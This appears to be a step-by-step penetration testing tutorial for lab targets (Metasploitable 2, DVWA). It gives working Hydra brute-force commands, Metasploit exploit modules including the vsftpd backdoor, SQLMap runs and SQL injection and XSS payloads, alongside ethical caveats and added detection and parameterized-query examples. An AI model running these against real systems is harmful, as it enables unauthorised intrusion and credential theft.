Exploiting Systems with Metasploit Framework: A Comprehensive Guide

Introduction

The Metasploit Framework is a powerful penetration testing tool used by security professionals to identify and exploit vulnerabilities in systems and networks. When specific ports (e.g., 21, 22, 25, 80, 8080, 443, 110, 465, 3306, 2091) are open, they may indicate services like FTP, SSH, SMTP, HTTP, HTTPS, POP3, SMTPS, MySQL, or others that could be vulnerable to exploitation. This article provides a professional, step-by-step guide to ethically exploiting systems using Metasploit, THC-Hydra, Burp Suite, and other methods in a controlled lab environment (e.g., Metasploitable 2 or Damn Vulnerable Web Application (DVWA)). The focus is on authorized security testing, emphasizing ethical and legal practices.

Ethical Note: Exploiting systems without explicit permission is illegal and unethical. This guide is for educational purposes and should only be applied in controlled environments or with authorization.

Prerequisites

Before proceeding, ensure the following:

  • A Kali Linux system with root access.
  • A target system (e.g., Metasploitable 2 or DVWA) in a controlled lab environment.
  • Wordlists for brute forcing (e.g., /usr/share/wordlists/rockyou.txt).
  • Basic knowledge of networking, Linux command-line, and penetration testing.
  • An internet connection for installing tools.
  • Authorization to test the target system.

Step 1: Setting Up the Environment

Kali Linux Setup

  1. Update Kali Linux:

sudo apt update && sudo apt upgrade -y

  2. Install Required Tools:
    • Metasploit Framework:

sudo apt install metasploit-framework -y

    • THC-Hydra:

sudo apt install hydra -y

    • Burp Suite: Pre-installed in Kali; launch via:

burpsuite

    • Nmap: Pre-installed in Kali for port scanning.
  3. Prepare Wordlists:
    • Extract the rockyou.txt wordlist:

gunzip /usr/share/wordlists/rockyou.txt.gz

    • Create a username list (e.g., users.txt):

echo -e "admin\nroot\nmsfadmin\ntestuser" > users.txt

Target System Setup

  1. Metasploitable 2:
    • Download from Rapid7 and set up in a virtual machine (e.g., VirtualBox).
    • Configure network to NAT or Host-Only.
    • Note the IP address (e.g., 192.168.1.100) using:

ifconfig

  2. DVWA (for web-based attacks):
    • Install a LAMP stack:

sudo apt install apache2 mysql-server php libapache2-mod-php -y

    • Download DVWA from GitHub and extract to /var/www/html.
    • Configure the database and access DVWA at http://<target-ip>/dvwa.

Step 2: Scanning and Enumeration

Use Nmap to confirm open ports and identify services.

Nmap Scan

  1. Run a Detailed Scan:

nmap -sS -sV -p 21,22,25,80,8080,443,110,465,3306,2091 -O 192.168.1.100

    • -sS: Stealth SYN scan.
    • -sV: Service version detection.
    • -p: Specific ports.
    • -O: OS detection.
  2. Example Output (Metasploitable 2):

21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd 2.2.8
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
443/tcp  open  https   Apache httpd 2.2.8
110/tcp  open  pop3    Dovecot pop3d
465/tcp  open  smtps   Postfix smtpd
3306/tcp open  mysql   MySQL 5.0.51a
2091/tcp open  unknown

Step 3: Brute Force Attacks with THC-Hydra

Hydra is effective for brute forcing credentials on services like FTP (21), SSH (22), SMTP (25), POP3 (110), SMTPS (465), and MySQL (3306).

FTP Brute Force (Port 21)

  1. Run Hydra:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ftp://192.168.1.100

    • Output example:

[21][ftp] host: 192.168.1.100 login: msfadmin password: msfadmin

  2. Save Results:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 -o ftp_results.txt ftp://192.168.1.100

SSH Brute Force (Port 22)

  1. Run Hydra:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.1.100

HTTP POST Form Brute Force (Ports 80, 8080, 443)

  1. Identify Login Form (e.g., DVWA):
    • Use Burp Suite to capture the POST request (see Step 4).
    • Example: username=admin&password=^PASS^&Login=Login.
  2. Run Hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.100 http-post-form "/dvwa/vulnerabilities/brute/:username=admin&password=^PASS^&Login=Login:Username and/or password incorrect."

MySQL Brute Force (Port 3306)

  1. Run Hydra:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 mysql://192.168.1.100

Step 4: Web Exploitation with Burp Suite

Burp Suite is ideal for exploiting web vulnerabilities on ports 80, 8080, and 443.

Setup

  1. Configure Proxy:
    • In Burp Suite, go to Proxy > Options and ensure the proxy is on (127.0.0.1:8080).
    • Set your browser to use the proxy.
  2. Enable Intercept: Go to Proxy > Intercept and turn on interception.

Brute Force Login

  1. Capture Request:
    • Navigate to http://192.168.1.100/dvwa/vulnerabilities/brute/.
    • Submit a test login (e.g., admin:test).
    • Intercept the POST request in Burp Suite.
  2. Send to Intruder:
    • Right-click the request, select Send to Intruder.
    • In Intruder > Positions, set attack type to Sniper or Cluster Bomb.
    • Highlight the password field and click Add §.
  3. Configure Payloads:
    • In Intruder > Payloads, load /usr/share/wordlists/rockyou.txt.
    • Add users.txt for usernames if needed.
  4. Start Attack:
    • Click Start Attack. Look for HTTP 302 responses or unique response lengths indicating success.

Exploit Vulnerabilities

  1. SQL Injection (Port 80/8080):
    • In DVWA, test for SQL injection in vulnerable fields.
    • Capture requests and use Burp Suite’s Repeater to test payloads (e.g., 1' OR '1'='1).
  2. XSS:
    • Test for XSS vulnerabilities:

<script>alert('XSS')</script>

    • Use Burp Suite to intercept and modify requests.

Step 5: Exploiting with Metasploit

Metasploit offers modules for exploiting services on the identified ports.

Setup

  1. Start Metasploit:

msfconsole

FTP Exploitation (Port 21)

  1. Check for Vulnerabilities:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.100
run

    • Confirm the banner reports vsftpd 2.3.4 (the release whose distributed tarball contained the backdoor; other versions are not affected).
  2. Exploit vsftpd Backdoor:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.100
set RPORT 21
run

    • If successful, a shell is opened.

SSH Exploitation (Port 22)

  1. Brute Force Credentials:

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
set THREADS 4
set STOP_ON_SUCCESS true
run

  2. Exploit Known Credentials:
    • If credentials are found (e.g., msfadmin:msfadmin), use:

use exploit/multi/ssh/sshexec
set RHOSTS 192.168.1.100
set USERNAME msfadmin
set PASSWORD msfadmin
run
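Seen from the target, the Hydra SSH run in Step 3 and the ssh_login scan above leave the same trace in /var/log/auth.log: a burst of "Failed password" lines from one source address across several usernames, sometimes followed by an accepted login. The following is an added example (not part of the original post) that detects that pattern with a sliding window over constructed sample lines; the sample log, the log year and the thresholds are assumptions:

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Constructed sample of the target's auth.log during a users.txt brute force (not a real capture).
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 target sshd[2201]: Failed password for invalid user admin from 192.168.1.50 port 41002 ssh2
Mar  3 10:15:01 target sshd[2202]: Failed password for root from 192.168.1.50 port 41003 ssh2
Mar  3 10:15:02 target sshd[2203]: Failed password for msfadmin from 192.168.1.50 port 41004 ssh2
Mar  3 10:15:02 target sshd[2204]: Failed password for invalid user testuser from 192.168.1.50 port 41005 ssh2
Mar  3 10:15:03 target sshd[2205]: Failed password for invalid user admin from 192.168.1.50 port 41006 ssh2
Mar  3 10:15:04 target sshd[2206]: Accepted password for msfadmin from 192.168.1.50 port 41007 ssh2
Mar  3 10:20:00 target sshd[2300]: Failed password for alice from 192.168.1.20 port 50001 ssh2
Mar  3 10:40:00 target sshd[2301]: Failed password for alice from 192.168.1.20 port 50002 ssh2
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) for an sshd password line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog lines carry no year
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=4, window_s=60):
    """Flag every source IP with >= threshold failures inside a window_s-second sliding window."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> usernames tried (Hydra -L cycles through them)
    alerts = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Accepted":
            if ip in alerts:      # a success right after a burst: treat as a cracked account
                alerts[ip]["success_after"] = True
            continue
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_s:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            entry = alerts.setdefault(ip, {"failures": 0, "users": [], "success_after": False})
            entry["failures"], entry["users"] = len(q), sorted(users[ip])
    return alerts
```

The second address fails only twice, twenty minutes apart, and is not flagged; the first is flagged after its fourth failure and marked because a login was accepted right after the burst.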

SMTP Enumeration (Port 25/465)

  1. Enumerate Users:

use auxiliary/scanner/smtp/smtp_enum
set RHOSTS 192.168.1.100
set RPORT 25
run

  2. Brute Force SMTP:

use auxiliary/scanner/smtp/smtp_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

HTTP Exploitation (Ports 80, 8080, 443)

  1. Scan for Vulnerabilities:

use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
set RPORT 80
run

  2. Exploit DVWA:
    • For command injection (if present):

use exploit/unix/webapp/dvwa_command_injection
set RHOSTS 192.168.1.100
set RPORT 80
set TARGETURI /dvwa
run

MySQL Exploitation (Port 3306)

  1. Brute Force Credentials:

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

  2. Exploit Weak Credentials:
    • If credentials are found (e.g., root:password):

use auxiliary/admin/mysql/mysql_sql
set RHOSTS 192.168.1.100
set USERNAME root
set PASSWORD password
set SQL show databases
run

POP3 Brute Force (Port 110)

  1. Brute Force Credentials:

use auxiliary/scanner/pop3/pop3_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

Unknown Service (Port 2091)

  1. Identify Service:
    • Use Nmap or Metasploit’s auxiliary/scanner/portscan/tcp to gather more details.
    • Check for known vulnerabilities using:

search port:2091

  2. Custom Exploitation:
    • If a specific service is identified, search for exploits in Metasploit or online databases like Exploit-DB.

Step 6: Other Exploitation Methods

SQLMap (Port 3306, 80, 8080, 443)

SQLMap automates SQL injection attacks.

  1. Install SQLMap:

sudo apt install sqlmap -y

  2. Test for SQL Injection:

sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=your_session_id" --dbs

    • Enumerate databases, tables, and dump data if vulnerabilities are found.
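To see why the 1' OR '1'='1 payload from Step 4 works, and what SQLMap is automating, here is an added example (not code from the original post or from DVWA) that runs the same lookup against a constructed in-memory SQLite table, once with string concatenation as the DVWA "low" page does and once with a bound parameter, which is the fix to recommend in the report:

```python
import sqlite3

# Constructed stand-in for DVWA's users table (example data, not DVWA's real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "gordonb", "brown"), (3, "pablo", "picasso")])
    return conn

def lookup_vulnerable(conn, user_id):
    # Mirrors the DVWA 'low' SQLi page: the id parameter is pasted into the query text,
    # so quotes and SQL keywords in the input become part of the statement.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, user_id):
    # Same lookup with a bound parameter: the input is only ever a value, never SQL syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

PAYLOAD = "1' OR '1'='1"   # the Repeater test payload from Step 4

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))   # every row comes back
    print("hardened:  ", lookup_hardened(db, PAYLOAD))     # no row has that literal id
```

The concatenated query becomes WHERE user_id = '1' OR '1'='1', which is true for every row; the parameterized version compares the whole payload string to the id column and matches nothing.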

Custom Scripts

For services on port 2091 or complex web apps:

  1. Python Script for HTTP Testing:

import requests  # third-party library: sudo apt install python3-requests (or pip install requests)
url = "http://192.168.1.100:2091"
with open("payloads.txt", "r") as f:          # one payload per line
    for line in f:
        payload = line.strip()
        try:
            response = requests.get(url, params={"input": payload}, timeout=5)
        except requests.RequestException as exc:
            print(f"Request failed for {payload!r}: {exc}")
            continue
        # Heuristic kept from the original: a response without "error" may merit a closer look.
        if "error" not in response.text.lower():
            print(f"Possible vulnerability: {payload}")

    • Save as test.py and run:

python3 test.py

Step 7: Testing and Validation

  1. Test Environment:
    • Use Metasploitable 2 or DVWA with known vulnerabilities.
    • Verify exploits (e.g., shells, database access) work as expected.
  2. Check Firewall Rules:

sudo ufw allow 21,22,25,80,8080,443,110,465,3306,2091/tcp

  3. Validate Results:
    • Confirm credentials or exploits grant access (e.g., SSH login, web shell).
    • Check Metasploit sessions (sessions -l to list them, sessions -i <id> to interact with one).

Step 8: Best Practices for Ethical Exploitation

  • Obtain Permission: Always have explicit authorization.
  • Limit Scope: Target only authorized systems and ports.
  • Secure Data: Delete captured credentials and logs after testing.
  • Use Safe Environments: Test in isolated labs to avoid unintended damage.
  • Combine Tools: Use Nmap for enumeration, Hydra for brute forcing, Burp Suite for web attacks, and Metasploit for exploitation.
  • Patch Vulnerabilities: Post-testing, recommend fixes (e.g., strong passwords, updated software).
  • Document Findings: Provide a detailed report with vulnerabilities and mitigation strategies.

Conclusion

The Metasploit Framework, combined with tools like THC-Hydra, Burp Suite, and SQLMap, provides a robust toolkit for ethically exploiting vulnerabilities on open ports (21, 22, 25, 80, 8080, 443, 110, 465, 3306, 2091). By following this guide in a controlled environment, security professionals can identify and address weaknesses in services like FTP, SSH, HTTP, and MySQL. Always prioritize ethical use, obtain permission, and implement best practices to ensure responsible and legal testing.

References:

  • Metasploit: https://docs.rapid7.com/metasploit/
  • THC-Hydra: https://www.kali.org/tools/hydra/
  • Burp Suite: https://portswigger.net/burp
  • SQLMap: https://sqlmap.org
